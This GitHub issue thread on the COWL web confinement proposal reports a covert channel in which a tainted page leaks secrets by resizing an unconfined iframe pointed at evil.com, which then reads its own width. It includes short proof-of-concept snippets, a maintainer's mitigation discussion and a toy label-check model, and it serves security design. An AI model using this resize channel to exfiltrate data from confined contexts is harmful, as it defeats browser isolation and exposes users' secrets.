
iFrame resizing as covert channel #60

Open

NAndreasson opened this issue May 16, 2016 · 1 comment

Comments

@NAndreasson

Ties into issue #33

By creating an unconfined child context, before becoming confined, it is possible to leak secrets to it.

Leaking Information

<iframe id="unconfined" src="http://evil.com/"></iframe>
<script>
  // Frame created while this context is still unconfined
  var unconfinedFrame = document.getElementById('unconfined');
  // After reading the secret, encode it in the frame's width
  if (secret == ...) {
    unconfinedFrame.style.width = ...;
  } else {
    unconfinedFrame.style.width = ...;
  }
</script>

Also there is a more "subtle" case where you indirectly change the size of the unconfined context.

<div id="conductor" style="width:600px;">
<iframe style="width:50%" src="http://evil.com"></iframe>
</div>
<script>
  // Resizing the container indirectly resizes the unconfined frame
  var conductor = document.getElementById('conductor');
  if (secret == ...) {
    conductor.style.width = ...;
  } else {
    conductor.style.width = ...;
  }
</script>

Retrieving Information

From the unconfined frame it is possible to retrieve information via the width/height properties.

<script>
  // Runs inside the unconfined frame: the width chosen by the parent is readable here
  var width = window.innerWidth;
  // compute secret
</script>
@deian

deian commented May 16, 2016

We discussed this on April 13 on https://gitter.im/w3c/webappsec-cowl

The short summary is that if a context has untainted children frames and then taints itself, it can leak data by re-sizing the iframe.

  • If we can disallow re-sizing, directly or indirectly, then the problem goes away: you can't re-size an iframe if the label of the frame is not more restricting. This is a bit tricky.
  • If we don't disallow re-sizing, then are we okay with leaks via this channel? Down the line: no. But maybe we can add principals sensitive:... to denote that data is very sensitive and should not be leaked via covert channels. This amounts to adding some more restrictions (e.g., you can't get tainted with this principal if you have untainted children).
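The resize restriction from the first bullet above, as an added example that is not part of COWL or this issue: a toy model of labels as conjunctions of disjunctions of origins (an assumed label shape, in the DC-label style COWL uses) with a check that refuses a resize when the child frame's label is not at least as restricting as the parent's current label.

```javascript
// Added example, not COWL's code. Assumption: a label is an array of
// clauses, each clause an array of origin strings meaning "origin A OR
// origin B"; the clauses are ANDed. [] is the public/untainted label.

// Does clause `d` imply clause `c`? A disjunction over fewer origins is
// stronger, so d implies c when every origin of d also appears in c.
function implies(d, c) {
  return d.every(o => c.includes(o));
}

// canFlowTo(l1, l2): is l2 at least as restricting as l1?
// Every clause of l1 must be implied by some clause of l2.
function canFlowTo(l1, l2) {
  return l1.every(c => l2.some(d => implies(d, c)));
}

// Toy browsing context: tracks its own label and its child frames.
// A resize is permitted only when the child's label is at least as
// restricting as the parent's label, which closes the channel above.
class Context {
  constructor(label) { this.label = label; this.children = []; this.width = 0; }
  addChild(label) { const c = new Context(label); this.children.push(c); return c; }
  taint(label) { this.label = this.label.concat(label); }  // adds clauses: more restrictive
  resize(child, width) {
    if (!canFlowTo(this.label, child.label)) {
      return { allowed: false, reason: 'child frame is less restricted than parent' };
    }
    child.width = width;
    return { allowed: true };
  }
}

// Replays the issue's scenario: create an unconfined child, read a secret
// (taint), then try to encode the secret in the frame width.
function replayScenario() {
  const page = new Context([]);                          // untainted at first
  const evil = page.addChild([]);                        // unconfined frame
  const before = page.resize(evil, 300).allowed;         // fine while untainted
  page.taint([['https://bank.example']]);                // secret labelled with one origin
  const after = page.resize(evil, 301).allowed;          // denied: child is less restricted
  const confined = page.addChild([['https://bank.example']]);
  const sameLabel = page.resize(confined, 301).allowed;  // allowed: child equally restricted
  return { before, after, sameLabel };
}
```

The second bullet's "sensitive" principal would be a further restriction layered on top of this check (refusing the taint itself while untainted children exist), which the model above does not implement.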
